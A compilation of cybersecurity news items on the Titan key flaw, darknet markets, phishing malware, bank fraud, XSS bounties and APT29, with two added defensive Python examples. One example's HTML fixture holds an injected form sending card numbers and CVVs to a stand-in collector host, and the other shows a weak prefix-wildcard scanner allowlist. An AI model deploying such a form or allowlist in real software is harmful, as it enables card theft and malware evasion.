Security Bug Discovered in Google's Titan Security Keys, Google Provides Free Replacement




A security bug in Google’s Titan Security Key can potentially allow fraudsters located nearby to bypass the security provided by the key. While the company provided a replacement key for free to all existing users, it blamed a “misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols” for the security bug.
Although the defective keys are reported to still protect against phishing attacks, the company decided to provide a replacement key regardless. The affected keys include all those sold in packages priced at $50; the package also includes a standard NFC/USB key.
To exploit the security bug, an attacker needs to be within Bluetooth range (around 30 feet) and must act promptly as the victim activates the key by pressing the button. The attacker can then use the misconfigured protocol to intercept the victim's device’s connection to the key and connect their own device instead. Provided they already have the victim's username and password, they would then be able to log in to the victim’s account.
Google has given assurances that the bug does not undermine the security key’s ultimate purpose, which is to provide security against phishing attacks; Google also urged users worldwide to keep using the keys until a replacement is provided.
In an announcement, the company said, “It is much safer to use the affected key instead of no key at all. Security keys are the strongest protection against phishing currently available.”
Around the time when Google launched its Titan keys, Stina Ehrensvärd, Yubico founder, wrote, “While Yubico previously initiated the development of a BLE security key, and contributed to the BLE U2F standards work, we decided not to launch the product as it does not meet our standards for security, usability and durability.”




Darknet: The digital underground



The arrest of two Delhi youths for the import and sale of illegal marijuana through the darknet in December last year sparked widespread discussion on the rising prominence of the darknet in India. With the darknet being the new market for drug peddlers and illegal traders, it is slowly becoming one of the most challenging problems to be tackled in this cyber age.

What is the darknet?

The World Wide Web can be divided into three categories: the surface web, the deep web and the dark web. While pages on the surface web (visible web) are indexed and can be easily accessed by the public, pages on the deep web are not indexed and hence cannot be readily accessed. The content of the deep web is hidden behind HTTP forms and includes many common services such as webmail, online banking, and services that users must pay for and that are protected by a paywall, such as video on demand, some online magazines and newspapers, and many more. Content on the deep web can be located and accessed by a direct URL or IP address and may require a password or other security access past the public website page. The dark web is the part of the internet that can be accessed only through ‘overlay networks’ and needs special browsers like Tor to access. Browsers like Tor ensure anonymity for the host as well as the user, by protecting the IP address with their ‘overlay network’ structure.

Illicit drugs, weapons and online fraud: the endless dangers of the darknet

The promise of anonymity the darknet offers has led to an alarming increase in its use in the last 4 years. A 2015 study showed that drugs are the most traded commodity on the dark web and 26 per cent of its content can be classified as ‘child exploitation’. A December 2014 study by Gareth Owen from the University of Portsmouth found that the most commonly hosted type of content on Tor was child pornography, followed by black markets. Stolen credit card details, forged documents, counterfeit currency and weapons are the other types of content. Reports of crowdfunded assassinations, hitmen and live streamed murders are believed to be available on the darknet.

How does it work?

Cryptocurrencies such as bitcoin are used for transactions on the darknet. Purchases on the darknet come with reviews and ratings just like on Amazon and Flipkart and are delivered to the customer’s doorstep just like any other order. Escrow services ensure that payment is released to the seller only after the customer receives the package. Often disguised, these illegal products mostly make their way through customs to the customers' doorstep.

Cracking the whip:

Though highly evasive, browsers like Tor aren’t completely untraceable. In early November, a coordinated action by the FBI and Europol known as Operation Onymous seized dozens of Tor hidden services, including three of the six most popular drug markets on the Dark Web. For now, just how the feds located those sites remains a mystery.

“The Interpol, Europol and the FBI are the ones striving hard to keep the darknet dangers in check”, says J. Prasanna, Director of Cyber Security and Privacy Foundation, Singapore.

“The first step towards net safety comes down to parental supervision”, says J. Prasanna, who provides dark web monitoring for banks.

“The Indian government should ensure stringent punishment for the offenders using darknet for illegal trade and activities. The police department too should be technologically advanced to handle such crimes”, says V. Rajendran, Chairman, Digital Security Association of India.


The bright side:

It would be safe to say not everything is dark about the darknet. The privacy it provides is a major attraction to many who are looking to escape the watchful eyes of service providers and federal agencies. Anonymous messenger services and access to tonnes of resources (data, books, documents) argue for the use of the darknet for good.

Author:
Yamuna Chandran

Most of the Antivirus Android Apps Ineffective and Unreliable



A report published by AV-Comparatives, an Austrian antivirus testing company, found that the majority of anti-malware and antivirus applications for Android are untrustworthy and ineffective.

While surveying 250 antivirus applications for Android, the company discovered that only 80 of them detected more than 30% of the 2,000 harmful apps they were tested with. Moreover, a lot of them showed considerably high false alarm rates.

The detailed version of the report showed that the officials at AV-Comparatives selected 138 companies which provide anti-malware applications on Google Play. The list included some of the most well-known names like Google Play Protect, Falcon Security Lab, McAfee, Avast, AVG, Symantec, BitDefender, VSAR, DU Master, ESET and various others.

ZDNet noted that the security researchers at AV-Comparatives resorted to manual testing of all the 250 apps chosen for the study instead of employing an emulator. The process of downloading and installing the malicious apps on an Android device was repeated 2,000 times, which led the researchers to their conclusion: the majority of those applications are not reliable or effective at detecting malware or viruses.

However, the study conducted by AV-Comparatives also highlighted that some of the offered antivirus applications can potentially block malicious apps.

As some of the vendors did not bother to add their own package names to the whitelist, the associated antivirus apps detected themselves as malicious. Meanwhile, some of the antivirus applications were found to use wildcards in their whitelists, allowing any package whose name starts with a prefix like "com.adobe", which can easily be exploited by hackers to evade detection.
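The two whitelisting mistakes described above, sketched as an added example (it is not code from AV-Comparatives or from any tested product): a prefix wildcard compared with entries pinned to an exact package name and signing-certificate digest. All package names, certificate bytes and the `heuristic_hit` flag are constructed assumptions.

```python
"""Allowlisting in a mobile malware scanner: prefix wildcard vs pinned entries.

Added illustration; every package name and certificate below is constructed.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class InstalledApp:
    package: str         # Android package name
    signer_cert: bytes   # bytes of the APK signing certificate (stand-in)
    heuristic_hit: bool  # True if the scan engine matched a malware signature


def cert_sha256(cert: bytes) -> str:
    """Digest used to pin an allowlist entry to one signer."""
    return hashlib.sha256(cert).hexdigest()


# Constructed stand-ins for real signing certificates.
VENDOR_CERT = b"constructed: legitimate vendor signing cert"
SCANNER_CERT = b"constructed: antivirus vendor signing cert"
ATTACKER_CERT = b"constructed: attacker self-signed cert"

# Weak: any package whose name merely starts with the prefix skips detection.
PREFIX_ALLOWLIST = ("com.adobe",)

# Hardened: exact package name AND signer digest must both match.
# The scanner's own package is listed so it does not flag itself.
PINNED_ALLOWLIST = {
    "com.adobe.reader": {cert_sha256(VENDOR_CERT)},
    "com.example.avscanner": {cert_sha256(SCANNER_CERT)},
}


def allowed_by_prefix(app: InstalledApp) -> bool:
    return app.package.startswith(PREFIX_ALLOWLIST)


def allowed_by_pin(app: InstalledApp) -> bool:
    pins = PINNED_ALLOWLIST.get(app.package)
    return pins is not None and cert_sha256(app.signer_cert) in pins


def scan(apps, is_allowed):
    """Return package names reported as malicious under the given allowlist."""
    return [a.package for a in apps if a.heuristic_hit and not is_allowed(a)]


# Constructed scan queue (not one device: two entries share a package name).
SAMPLES = [
    InstalledApp("com.adobe.reader", VENDOR_CERT, False),        # genuine app
    InstalledApp("com.adobe.flash.update", ATTACKER_CERT, True), # squats the prefix
    InstalledApp("com.adobefake.cleaner", ATTACKER_CERT, True),  # prefix has no dot boundary
    InstalledApp("com.adobe.reader", ATTACKER_CERT, True),       # repackaged, wrong signer
    InstalledApp("com.example.avscanner", SCANNER_CERT, True),   # scanner ships signatures
    InstalledApp("com.example.trojan", ATTACKER_CERT, True),     # ordinary detection
]

if __name__ == "__main__":
    print("prefix allowlist reports:", scan(SAMPLES, allowed_by_prefix))
    print("pinned allowlist reports:", scan(SAMPLES, allowed_by_pin))
```

With the prefix list, the three attacker-signed "com.adobe…" packages go unreported while the scanner flags itself; with pinned entries the result is the reverse.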

On the safer side, Google provides Play Protect, which guards Android against viruses by default. Despite that, some users opt for anti-malware apps from third-party app stores or other unknown sources, which affects the safety of their devices.

Malicious apps have also been found on Google Play in the past, and with the aforementioned study, Android is becoming an unsafe mobile platform.




QR-codes on historical buildings of Russian city Astrakhan that led to Adult sites have been removed


A hacker reportedly changed the website that the QR codes on historical buildings in the Russian city of Astrakhan pointed to, replacing it with a link to an adult website. No technical details were provided on how the hacker was able to change the destination of the QR codes.

When residents and guests of the city scanned QR-codes, their phones opened resources for adults, instead of sites with historical references.

Galina Goteeva, the Minister of Culture and Tourism of the region, said on March 15 that the signs with QR codes on the historical buildings of Astrakhan were changed.

The QR codes were placed on historically significant buildings of Astrakhan a few years ago. The idea was that people could get a historical reference about a building by scanning the code with a mobile phone. As early as November last year, the media reported QR codes leading to porn sites and dating sites for quick sex.

In fact, the Regional Ministry of Culture struggled for a long time to eliminate the porn content, and the signs were removed with great difficulty. Only at the end of the year was the sex traffic stopped completely.

However, it is still a mystery why the signs with QR-codes hung for so long and why they were not promptly replaced. In total, there are at least 15 signs. QR-codes stopped working more than a year ago, but officials did not pay any attention to it: first, the pages gave an error, and later they began to lead to porn sites.

Hackers Delivering New Muncy Malware Worldwide through DHL Phishing Campaign



Attackers targeting users across the globe are reported to be distributing a new malware, dubbed Muncy, in the form of an EXE file through DHL phishing campaigns.

Relying on malspam emails, DHL phishing is among the most far-reaching campaigns and has distributed several sophisticated pieces of malware. The attackers made the emails appear legitimate by exploiting poorly configured SMTP servers and by employing email spoofing techniques.

DHL is a company of global repute which specializes in providing express mail services, international couriers and parcels. The reputation of the well-established company took some hits as cybercriminals abused it to distribute malware.

They did so by configuring the malicious emails to appear to come from DHL Express. The email contained an infected attachment in PDF format.

How is the malware executed?

As soon as the targeted user opens the PDF attachment, the Muncy Trojan file sneaks into the system. The packed malware is then unpacked, and once unpacked it scans the whole C:\ drive for files containing sensitive data.

Expert takes

Commenting on the matter, Pedro Tavares, founder and pentester at CSIRT.UBI, told GBHackers, “The phishing campaign is trying to impersonate DHL shipment notification and the malware is attached in the email.”

“This malware is on the rise and is affecting users in the wild while stealing sensitive information from their devices.”





Scammers disguise themselves as divisions of the Central Bank of Russia


Cybercriminals carried out a large-scale attack on Russian banks in late 2018 and managed to steal $20 million.

The attackers disguised themselves as divisions of the Central Bank FinCERT and Alfacapital. It is known that the attacks were carried out by the hacker groups Silence and Cobalt, which had previously organized cybercrime. A new hacker group, which had not been seen before, operated alongside them.

The scheme of the crimes was the same: the scammers sent out malicious documents with macros on behalf of the FinCERT division of the Central Bank. In addition, a compromised account of an employee of the company Alfacapital was used.

Representatives of many banks confirm the frequent attacks. The criminals tried to penetrate the infrastructure of the financial organization in order to withdraw money.

The IT company Positive Technologies compiled its own statistics and found that over 201 million people suffered from such attacks in 2018.

Moreover, banking infrastructure was attacked in 78% of cases, web resources - 13%, ATMs and POS terminals - 9%, personal data - 39%, credential theft, card information, trade secrets - 5%, personal correspondence and other information - 8%.

In addition, on February 18, Kaspersky Lab recorded an increase in attacks by the Buhtrap and RTM banking Trojans in Russia. At the end of last year, experts recorded a 50-fold increase in the activity of the banking Trojan RTM compared to 2017.

Over 200 Million Chinese CVs Compromised On The Dark Web









Recently, a database comprising over 200 million Chinese CVs was discovered exposed online, laid bare for the dark web to devour. Naturally, it spilled explicitly detailed information.

Lacking even basic security measures, the database exposed some really personal data of people.

The database included their names, addresses, mobile phone numbers, email addresses, education details and more.

The detailed information in the database was compiled by persistently scraping various Chinese job sites.

Reportedly, the director of the research institution said that, at the outset, the data was thought to have come from a huge classified advert site, namely BJ.58.com.

Nevertheless, BJ.58.com vehemently denied the claim and any relation to this incident.

They had thoroughly analysed and checked their databases and found nothing questionable, giving assurance that they had no role to play in the data leakage.

They also mentioned that some third-party CV website “scraper” is certainly to blame.

News of this data cache first spread via Twitter, and soon after that, it was removed from the Amazon cloud where it had been stored.

But, as further analysis revealed, it had been copied around 12 times before it was deleted.

There has been a series of incidents in which Chinese users have been affected, and this data leak is the latest of them.

From online rail bookings to the alleged theft of rail travelers' personal data, the early days of January were quite bad for the people of Beijing.

Reportedly, in August last year, the police of China were busy investigating a data breach of hotel records of over 500 million customers.

Personal data, including the booking details and accounts, registration details and other similar information, were leaked.

Also, the Internet Society of China had released a report which mentioned the several phishing attacks and data breaches the country’s residents had faced.


UK spymasters suspect Russia is using Kaspersky to spy on people

 

The British intelligence service is reportedly worried that Kaspersky Antivirus, offered by Barclays to its customers, may be being used by a Russian intelligence agency to spy, according to The Financial Times.

An unnamed official told The Financial Times that GCHQ, the British intelligence agency, has concerns over the widespread distribution of Kaspersky in the UK.

Intelligence officials fear that this might allow Russia to gather intelligence from the computers of government employees and members of the military who are customers of the bank and have downloaded the software.

The Financial Times added that "No evidence suggests that any data of Barclays customers have been compromised by use of Kaspersky software on their computers."

However, the bank said it was planning to end the deal with Kaspersky for commercial reasons that have no connection with the GCHQ concerns.

Kaspersky denied the allegations and said the company does not have inappropriate ties with any government.

"No credible evidence has been presented publicly by anyone or any organization. The accusations of any inappropriate ties with the Russian government are based on false allegations and inaccurate assumptions, including the claims about Russian regulations and policies impacting the company," Kaspersky said.

Earlier this year, US Spymasters and FBI chief said that they do not trust software from Russian antivirus company Kaspersky.

- Christina
 

Russian hackers stole 60.5 million rubles using malware

According to the Ministry of International Affairs of the Russian Federation, two natives of the Sverdlovsk region stole more than 60.5 million rubles from the Petropavlovsk-Kamchatsky (center of Kamchatka Krai) Bank and other commercial organizations.

Irina Volk, official representative of the MIA, said that the hackers were able to access the computers of the affected organizations using malware. The stolen money was transferred to the bank accounts of front organizations and cashed out.

Criminal cases of illegal access to computer information and cybercrime will be heard soon. Under the first case, the hackers can face up to five years' imprisonment. Under the second, they can face up to ten years with a fine of up to one million rubles.

It is known that they have other partners. The investigation against the hacker group continues.

According to Ilya Sachkov (CEO and founder of Group-IB), 100% effective safeguards against cyber attacks do not exist, but every organization can reduce the risks and improve the protection of banks. The most important thing for organizations is the creation of their own Information Systems and Security Division.

- Christina


Putin Says Number of Cyber attacks against Russia grew three times

The number of attacks launched against Russian cyberspace has increased significantly in recent years, President of the Russian Federation Vladimir Putin said at the annual board meeting of the Federal Security Service on February 16.

"The Number of cyber attacks against official information databases has tripled in the past year compared to 2015," said the President.

On 11 February, Oleg Salagai, the Director of the Department of public health & communications Ministry, said that unknown hackers attacked the official website of the Health Ministry. The attackers failed to gain access to any personal data or classified files.


Making Indian Cyberspace Secure!


At a time when Cyber attacks are increasing with every passing day, the Indian government on Tuesday (February 21) launched a Cyber Swachhta Kendra (Botnet Cleaning and Malware Analysis Centre) which is a desktop and mobile security solution for maintaining a secure Cyber space in the country.

India’s IT and Electronics Minister, Ravi Shankar Prasad through its Computer Emergency Response Team (CERT-in) launched the M-Kavach tool in New Delhi which offers a comprehensive mobile device security solution for Android devices addressing threats related to mobile phones. The new solution will notify, enable cleaning and secure systems of end-users to prevent further infections.

"Launched 'Cyber Swachhta Kendra' (Botnet Cleaning and Malware Analysis Centre), an imp milestone in various initiatives taken on Cyber Security," tweeted Prasad. A botnet is fundamentally a network of automated programs (bots), each running on a computing device, which can be any IoT/smart device. The attacks carried out using botnets include Distributed Denial of Service (DDoS) attacks.

* Botnet Cleaning and Malware Analysis Centre (Cyber Swachhta Kendra) -

India has been ranked 3rd in botnet distribution. It is a good move for the Indian government to clean the computers. CERT-In has chosen an Indian product for this.

Research by CSPF (a non-profit organization) found that the free Malwarebytes and Avast anti-virus products are more effective in removing viruses/bots.

The free product chosen by CERT-In also advertises that the botnet cleaning tool is not a replacement for anti-virus. "The vendor is trying to sell his other anti virus solutions which is totally unacceptable," according to a US-based anti-virus company.

"Antivirus and botnet cleaners should be constantly maintained. Who is going to do this, CERTIn or Indian vendor?" asks the US-based anti-virus company.

According to CSPF, "some samples of botnet were missed by this tool"; the tool should have a facility to report malware that it missed.

"Launched USB Pratirodh, which will control the unauthorized usage of removable USB storage media devices like pen drives, external hard drives. Launched App Samvid, to protect Desktops from suspicious applications from running," the minister added.

USB Pratirodh is a desktop security solution that controls the usage of removable storage media like pen drives, external hard drives and other USB-supported mass storage devices.

AppSamvid is a desktop solution which protects systems by allowing installation of genuine applications through white listing. This helps in preventing threats from malicious applications.

According to Cyber Security & Privacy Foundation, "Some of these tools developed by CDAC including white listing tool are far more complex for a normal user to understand. White listing tool does not detect .msi files and other extensions."
Blocking or allowing executables has to be done manually. Most end users don't understand whitelisting, and they don't know which to allow or block when there is an issue. Users should not end up locking their own computers. Automatic whitelisting, which is available in some well-known anti-virus products, should be included.

The reason cyber security is an issue among the common man is because the common man does not understand anything technical. If using the tool is more complex than the actual problem, how are we going to solve the problem, says a college student.

He also suggests "video should be released by CDAC showing what the tool is about and how to install and run" in multiple languages. 

During the launch, Prasad said that 13 banks and Internet service providers are using this government facility at present and that the government will coordinate with other ISPs and product/antivirus companies to spread its usage for a safer online space.

Prasad said that this Kendra will also enhance awareness among citizens regarding botnet and malware infection along with measures to be taken to secure their devices.

The minister also announced that the National Cyber Coordination Centre will be operational by June 2017 and CERT-Ins will be set up at state level as well.

"The government will set up 10 more STQC (Standardization Testing and Quality Certification) testing Facilities. Testing fee for any start-up that comes up with a digital technology in the quest of cyber security will be reduced by 50 per cent. We will also empower designated forensic labs to work as the certified authority to establish cyber crime," Prasad noted.

The move comes at a time when over 50,300 cyber-security incidents like phishing, website intrusions and defacements, virus and DDoS attacks have been observed in the country during 2016.

As per the information reported to and tracked by CERT-In, a total number of 44,679, 49,455 and 50,362 cyber-security incidents were observed during the years 2014, 2015 and 2016, respectively.

The Cyber Swachhta Kendra is part of the government of India’s Digital India initiative under the Ministry of Electronics and Information Technology (MeitY). The Cyber Swachhta Kendra complies with the objectives of the National Cyber Security Policy which aims at creating a secure cyber Eco-system in the country.

The botnet and malware cleaning analysis centre was announced in 2015 with an outlay of Rs. 100 crores.

Industry experts wonder whether the 100 crore outlay is going to be used for building antivirus/botnet cleaning software and honeypots to track bots and take down botnets.

The threat of Cyber security has become more serious and visible in the past few years in the country. There is a need to collaborate and come forth with more solutions like the Cyber Swachhta Kendra. It was a much-needed move by the government. It should not be just another public relation exercise but it should be effective.

You can download the tools from here:
http://www.cyberswachhtakendra.gov.in/security-tools.html


Cyber Insurer sued after company loses $480K in CEO Fraud

A Texas-based engineering firm, Ameriforge Group Inc., popularly known as AFGlobal, is suing its cyber insurance provider, Federal Insurance Co., a division of insurance giant Chubb Group, for refusing to cover a $480,000 loss following an email scam that impersonated the firm’s chief executive.

AFGlobal claims to have the papers to prove that scammers impersonating AFGlobal’s CEO convinced the company’s accountant to wire $480,000 to Agricultural Bank of China.


According to documents filed with the U.S. District Court in Harris County, Texas, the policy covered up to $3 million, with a $100,000 deductible. The documents indicate that from May 21, 2014 to May 27, 2014, AFGlobal’s director of accounting received a series of emails from someone claiming to be Gean Stalcup, the CEO of AFGlobal.

After the demand was fulfilled, the email sender then asked for an additional $18 million.

The firm expects some payout from its insurer for this incident but the insurer expects all this to go away.

CEO Fraud schemes are an increasingly common and costly form of cybercrime. According to the FBI, thieves have stolen nearly $750 million in such scams from more than 7,000 victim companies in the U.S. between October 2013 and August 2015.

The chief financial officer of one of New Zealand’s largest learning institutions left her job after falling for an email “whaling” scam.

The executive director of finance at Te Wananga o Aotearoa, Bronwyn Koroheke, transferred $US 79,000 ($118,000) to an offshore bank account after receiving an email which appeared to be from her chief executive, Jim Mather, telling her to send the money. The email was actually sent by Chinese-based fraudsters running a whaling scam.

In such a scenario, the FBI has urged businesses to adopt two-step or two-factor authentication for email, where available, and/or to establish other communication channels such as telephone calls to verify significant transactions. Businesses are also advised to exercise restraint when publishing information about employee activities on their Web sites or through social media.

Source: KrebsOnSecurity

Mozilla awarded $2,500 to security researcher

Security researcher Ashar Javed recently discovered three bugs in the Mozilla add-ons portal, which were exploited via the "Create new collection" feature.

It was discovered that malicious code could be inserted into collections of Mozilla add-ons. These collections are used to organize add-ons for business and personal purposes and can be shared on social media as well.

“Given that the Mozilla add-on site has millions of downloads, it is easily possible for the attacker to convince the victim to visit the collection page,” the expert told SecurityWeek.

Users were thereby exposed to all kinds of attacks that can be carried out via XSS flaws, the most common being cookie theft.

Websites are generally vulnerable to XSS flaws, and add-on collections are very useful for Firefox users, so for discovering the issue Mr Javed received $2,500 from Mozilla. Two other bugs were also discovered, about which Mozilla did not reveal any information apart from the location.

This is not the first time that he has received a large sum: Google awarded him $3,000 for a reflected XSS in the main search bar of the YouTube Gaming website.

Smart devices at risk with three-year-old vulnerability

A total of 6.1 million smart TVs, routers and phones are at risk due to a three-year-old vulnerability which has not been patched by many vendors.

The problem stems from a flaw in the Portable SDK for UPnP™ Devices, or libupnp: a buffer overrun that can be used to run arbitrary code on an affected device, giving the attacker the ability to take control of the device.

Devices that do not have defenses such as data execution prevention and address space layout randomization are at risk because of this.

This library is used to implement media playback (DLNA) or NAT traversal (UPnP IGD). Apps on a smartphone can use these features to play media files or connect to other devices within a user’s home network.

Although a patch was issued for the component in December 2012, Trend Micro, a global security software company, found 547 apps that used an older unpatched version of it. Of these, 326 are available on the Google Play store, including high-profile apps such as Netflix and Tencent QQMusic.

The vulnerability is also found widely in 3G and 4G cellular USB modems and routers.

Concern is growing over how manufacturers of devices such as routers and smart TVs deal with security vulnerabilities that emerge in their products.


Android and iOS developers need to keep an eye out for security fixes when including third-party libraries that use C/C++, and update their apps accordingly.

World Bank site hacked to launch PayPal phishing page

A report published in SecurityWeek confirmed that the official website of the World Bank’s Climate Smart Planning Platform (CSPP) project had been hacked by two hackers, and was later used to host a well-designed PayPal phishing page.

According to the news report, the website of the CSPP project, which focuses on helping developing countries create and implement climate-smart policies, was ideal for phishing attacks as it used an Extended Validation (EV) SSL certificate issued by Comodo for the World Bank Group.

Since the website carried an EV SSL certificate issued for the World Bank Group, it gave the phishing page enough credibility for visitors to easily fall for it.

It is said that the certificate gives the “highest available level of trust” as it is offered after an extensive verification process.

A site with such a certificate then displays the name of its owner.

The PayPal phishing page tricked visitors into logging in with their PayPal credentials. As soon as the data was submitted and stolen, the user was told that the site was unable to load the user’s account and required confirmation of their personal information.

The site then required the user to share their email address, name, postal address, date of birth, and phone number.

Then, it asked the user to verify their PayPal payment information, including credit card number, expiry date, its CVV number, and 3D Secure password if the card required verification. After collecting this personal and payment information, the phishing site then directed the user to the legitimate PayPal website.

The phishing page was hosted on climatesmartplanning.org, and the fact that the green address bar in the browser displayed “World Bank Group” might have convinced users that the page was legitimate.

According to various news reports, the same CSPP website was also targeted by a different type of hacker. Although the phishing page was removed by the CSPP webmasters, the site’s homepage was defaced by an Iraqi hacker who appears to deface random websites in an effort to boost his reputation among his peers.

Today, the site’s EV certificate has been revoked.



Teenager who hacked US and British government website faces jail

A British teenage hacker has been warned by the Birmingham Crown Court that he faces possible jail time for bringing down the websites of the FBI and the Home Office.

Charlton Floate (19) has pleaded guilty to three counts under the Computer Misuse Act and three charges of possessing prohibited images.

Charlton's lawyers argued that their client was only on the outside of the whole conspiracy and not deeply involved in the matter, but the court has ruled out that possibility, saying that Charlton is a very intelligent man who is an expert in computer marketing.

The judge said in the hearing, "A successful attack on the FBI.gov website is regarded by hackers as the Holy Grail of hacking. It was this which he attempted and, indeed, achieved. He was the person who instituted such attacks and assembled the tools and personnel for doing so."

The FBI site was down for about five hours whereas the Home Office site crashed for 83 minutes.

PayPal fixes serious vulnerability in its domain

A serious flaw in PayPal Holdings Inc, an American company which operates a worldwide online payments system, has been patched. The flaw could have allowed an attacker to trick users into handing over their personal and financial details.

The flaw, which was detected by Ebrahim Hegazy, was caused by a stored cross-site scripting (XSS) bug in the SecurePayments.PayPal.com domain, which is used for PayPal’s hosted solution that enables buyers to pay with a payment card or their PayPal account, eliminating the need to capture or store sensitive payment information.

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behalf of users or even transfer the users fund to his own account,” the researcher posted in his blog.

According to the Egypt-based researcher, a malicious actor could have set up a rogue shopping site or hijacked a legitimate website, and altered the “Checkout” button with a URL designed to exploit the XSS vulnerability.

The flaw could allow the attacker to change the contents of the SecurePayments page and display a phishing page where the victim is instructed to enter personal and financial information. The collected data is then sent back to a server controlled by the attacker, the researcher explained.
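One way a defender could audit a rendered payment page for the kind of injected data-collection form described above. This is an added example, not code from the original article, the researcher or PayPal; the hostnames, field-name hints and function names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SENSITIVE_TYPES = {"password"}
SENSITIVE_HINTS = ("card", "cvv", "expiry", "password", "secure")  # assumed name hints

class FormCollector(HTMLParser):
    """Record every <form> and the (type, name) of each <input> inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["fields"].append(
                ((a.get("type") or "text").lower(), (a.get("name") or "").lower()))
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_forms(page_url, html, allowed_hosts):
    """Flag forms that send sensitive fields off-origin or over clear text."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        fields = [n for t, n in form["fields"]
                  if t in SENSITIVE_TYPES or any(h in n for h in SENSITIVE_HINTS)]
        # An empty or relative action resolves against the page's own URL.
        target = urlsplit(urljoin(page_url, form["action"]))
        reasons = []
        if target.hostname not in allowed_hosts:
            reasons.append("off-origin action")
        if target.scheme != "https":
            reasons.append("clear-text submission")
        if fields and reasons:
            findings.append({"action": target.geturl(), "fields": fields, "reasons": reasons})
    return findings

# Constructed sample: a hosted payment page whose stored content gained a second form.
PAGE_URL = "https://payments.example/pay"
SAMPLE_HTML = """
<form action="/checkout"><input type="password" name="password"></form>
<form action="http://collector.example/c">
  <input name="card_number"><input name="cvv"><input type="submit" value="Pay">
</form>"""
FINDINGS = audit_forms(PAGE_URL, SAMPLE_HTML, {"payments.example"})
```

A `Content-Security-Policy` header with `form-action 'self'` applies the same restriction in the browser, so an injected form cannot post to another origin.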

The researcher, who had found a serious flaw in a Yahoo domain last year, reported the vulnerability to PayPal on June 19. The payment processor confirmed patching the flaw on August 25.

After that, the company awarded Hegazy $750 for his findings, which is said to be the maximum bug bounty payout for XSS vulnerabilities.

FBI catches teen accused of Swatting

A teenager from Texas has pleaded guilty to swatting and making bomb threats against a Minnesota high school after being caught by the FBI.

The 19-year-old Zachary Lee Morgenstern is accused of pulling off various swatting incidents in the Marshall, Minnesota area from October 2014 to May 2015.

Zachary is also accused of threatening a police officer and his family.

The FBI got hold of Zachary by sending a subpoena to Google to get details of one of Zachary's email accounts.

The FBI zeroed in on Zachary by using a Twitter handle and a Google email ID.

Russian APT attackers control the Hacked Machines using Twitter, Github




Russian APT attackers have used an advanced type of backdoor which tries to avoid detection by adding layers of obfuscation and mimicking the behavior of legitimate users. 

The attackers used popular legitimate websites such as Twitter, Github and other compromised web servers to send instructions and steal data from the compromised machines, according to an APT report published by the security firm FireEye.

The group, known as APT29, created an algorithm that generates daily Twitter handles and embeds commands in pictures.

The attackers post instructions for their backdoors in a tweet, which contains a URL and a hashtag. The malware downloads the contents hosted at the specified URL, including all images on the page.

They hide the data and other instructions within an image file using a technique called steganography.

The hashtag contains a number representing a location within the image file and a few characters that should be appended to the decryption key. The key is used for retrieving the data stored in the image.

The instructions also specify where to upload the stolen data: the malware uploads it to a specific account on a cloud storage service using the login credentials.

APT29 is suspected to be in Russia since it is active during normal working hours in Moscow.

SEBI comes up with cyber security policy for stock exchanges, depositories and clearing corporations

The Securities and Exchange Board of India (SEBI), which was established in 1988 to regulate the securities market in India, has asked stock exchanges, depositories and clearing corporations to put in place a system that would protect systems, networks and databases from cyber attacks and improve their resilience.

According to a report published on LiveMint, the SEBI said these Market Infrastructure Institutions (MIIs) need to have a robust cyber security framework to provide essential facilities and perform systemically critical functions of trading, clearing and settlement in the securities market.

“As part of the operational risk management framework to manage risk to systems, networks and databases from cyber attacks and threats, the MII should formulate a comprehensive cyber security and cyber resilience policy document to put in place such a framework,” the SEBI said.

It is said that the SEBI also asked the MIIs to restrict access to cases where it is necessary, so that no one will have any intrinsic right to access confidential data, applications, system resources or facilities.

The SEBI has asked the MIIs to deploy additional controls and security measures to supervise staff with elevated system access entitlements.

According to the news report, the SEBI Chairman UK Sinha said that attackers are attacking in a more sophisticated manner.  

“We are worried over state-sponsored cyber attacks. There are worries that the vulnerability in markets are increasing. We need to create a framework for future plan of action on securities market resilience,” he added.

The exchanges and the other MIIs would also have to submit quarterly reports to the SEBI, containing information on cyber attacks and threats experienced by them and measures taken to mitigate vulnerabilities, threats and attacks, including information on bugs, vulnerabilities and threats that may be useful for the other MIIs.

Along with this, the MIIs have to share the useful details among themselves in a masked and anonymous manner, using a mechanism to be specified by the regulator from time to time, and to identify critical assets based on their sensitivity and criticality for business operations, services and data management.

Likewise, each MII should maintain an up-to-date inventory of its hardware and systems, software and information assets (internal and external), details of its network resources, connections to its network and data flows.

The SEBI asked market stakeholders to establish baseline standards to facilitate consistent application of security configurations to operating systems, databases, network devices and enterprise mobile devices within the IT environment, and also to restrict physical access to the critical systems to a minimum.